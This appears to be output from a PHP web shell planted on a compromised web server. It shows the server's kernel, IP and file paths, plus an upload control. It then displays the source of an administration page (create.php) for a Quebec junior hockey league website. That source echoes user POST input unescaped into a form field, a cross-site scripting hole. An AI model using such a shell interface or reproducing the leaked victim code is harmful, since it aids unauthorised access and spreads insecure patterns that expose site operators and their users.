AlaK4X
Linux lhjmq-records 5.15.0-118-generic #128-Ubuntu SMP Fri Jul 5 09:28:59 UTC 2024 x86_64



Your IP : 3.149.29.190


Current Path : /var/www/lhjmq-records.qc.ca/public_html/administration/news_logosmenugauche/
Upload File :
Current File : /var/www/lhjmq-records.qc.ca/public_html/administration/news_logosmenugauche/create.php

<?
//Modules information
$moduleclassid = "bcb18f7062b3853635c99113b5d6cd39";
$permission = 3;

//Load the standard includes
include("../includes/secur_isloggedin.php");
include("../includes/mysql_connect.php");
include("../includes/secur_accessverify.php");
?>
<html>
<head>
<title>Administration - www.lhjmq.qc.ca</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="../css/base.css" type="text/css">
<link rel="stylesheet" href="../css/admintheme.css" type="text/css">
<link rel="stylesheet" href="../css/tablespecials.css" type="text/css">
<script language="JavaScript">
<!--
var gwhl_quickNav = null;
function nav_window(formtag, fieldname) {
	if(gwhl_quickNav != null && gwhl_quickNav.closed == false){
		gwhl_quickNav.close();
	}
	gwhl_quickNav = window.open('../info_filebrowser/quicknav.php?formtag='+formtag+'&fieldname='+fieldname, 'quicknav', 'width=250, height=400, scrollbars=yes, menu=no');
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div align="center" class="normaltext"><span class="titletext"><br>
  Module d'administration</span><br>
  <span class="subtitletext">www.lhjmq.qc.ca</span>
<hr width="70%" size="1" noshade>
  <a href="main_step1.php" class="normallink">Retour &agrave; l'&eacute;tape 
  1</a><br>
  <hr width="70%" size="1" noshade>
  <table width="100%" border="0" cellspacing="0" cellpadding="0" class="normaltext">
    <tr> 
      <td width="30" class="lightbgcorner">&nbsp;</td>
      <td colspan="3" bgcolor="#000099"><strong><font size="+1"><span class="darktitle">Logos publicitaire</span></font></strong></td>
    </tr>
    <tr> 
      <td width="30" bgcolor="#000099">&nbsp;</td>
      <td width="200" align="right">&nbsp;</td>
      <td width="20">&nbsp;</td>
      <td width="350" align="left">&nbsp;</td>
    </tr>
    <tr> 
      <td width="30" bgcolor="#000099">&nbsp;</td>
      <td colspan="3" align="left" class="cellpadding5">
				<p><b>Cr&eacute;ation d'un logo </b></p>
				<form action="create_script.php" method="post" name="logopub" enctype="multipart/form-data">
						<table width="100%" border="0" cellpadding="3" cellspacing="0" class="normaltext">
						<tr>
							<td height="10">&nbsp;</td>
							<td width="300"><strong>Image</strong></td>
							<td width="300"><b>Rang</b></td>
							<td>&nbsp;</td>
						</tr>
						<tr>
							<td height="10">&nbsp;</td>
							<td width="300">
              	<table border="0" cellpadding="0" cellspacing="0" class="normaltext">
              		<tr class="normaltext">
              			<td align="right" class="normaltext">Utiliser le lien</td>
              			<td class="normaltext">&nbsp;</td>
              			<td>
              				<input name="image" type="text" class="blackText11px" id="image" value="<?php echo stripslashes($_POST['image']); ?>" size="20">
              				<input name="nav_image" type="button" class="blackText11px" id="nav_image" value="Trouver" onClick="nav_window('logopub', 'image')">
              				</td>
             			</tr>
              		<tr class="normaltext">
              			<td align="right" nowrap class="normaltext">Ou envoyez une nouvelle photo</td>
              			<td class="normaltext">&nbsp;</td>
              			<td>
              				<input name="image_upload" type="file" class="blackText11px" id="image_upload" size="20" style="border: 1px solid #546085">
              				</td>
             			</tr>
              		</table>
							</td>
							<td width="300" valign="top">
									<input name="rank" type="text" id="rank" value="128" size="5" maxlength="3">
							</td>
							<td>&nbsp;</td>
						</tr>
						<tr>
							<td height="10">&nbsp;</td>
							<td width="300">&nbsp;</td>
							<td width="300">&nbsp;</td>
							<td>&nbsp;</td>
						</tr>
						<tr>
							<td width="30">&nbsp;</td>
							<td width="300" height="10"><strong>Lien sur page fran&ccedil;aise</strong></td>
							<td width="300" height="10"><strong>Lien sur page anglaise</strong></td>
							<td width="30">&nbsp;</td>
						</tr>
						<tr>
							<td width="30">&nbsp;</td>
							<td width="300" height="10"><input name="lien_fr" type="text" id="lien_fr" size="40" maxlength="250">
							</td>
							<td width="300" height="10"><input name="lien_en" type="text" id="lien_en" size="40" maxlength="250">
							</td>
							<td width="30">&nbsp;</td>
						</tr>
						<tr>
							<td>&nbsp;</td>
							<td width="300" height="100%">&nbsp;</td>
							<td width="300" height="100%">&nbsp;</td>
							<td height="100%" align="left" valign="top">&nbsp;</td>
						</tr>
						<tr>
							<td width="30">&nbsp;</td>
							<td width="300"><input type="submit" name="Submit" value="Sauvegarder"></td>
							<td width="300">&nbsp;</td>
							<td width="30">&nbsp;</td>
						</tr>
					</table>
				</form>
				
			</td>
    </tr>
  </table>
  <br>
  <hr width="70%" size="1" noshade>
  <a href="main_step1.php" class="normallink">Retour &agrave; l'&eacute;tape 
  1</a>
<hr width="70%" size="1" noshade>
  <?include("../includes/logogroupimage.php");?>
</div>

</body>
</html>

<?
//Load the standard includes footers
include("../includes/mysql_cleanup.php");
?>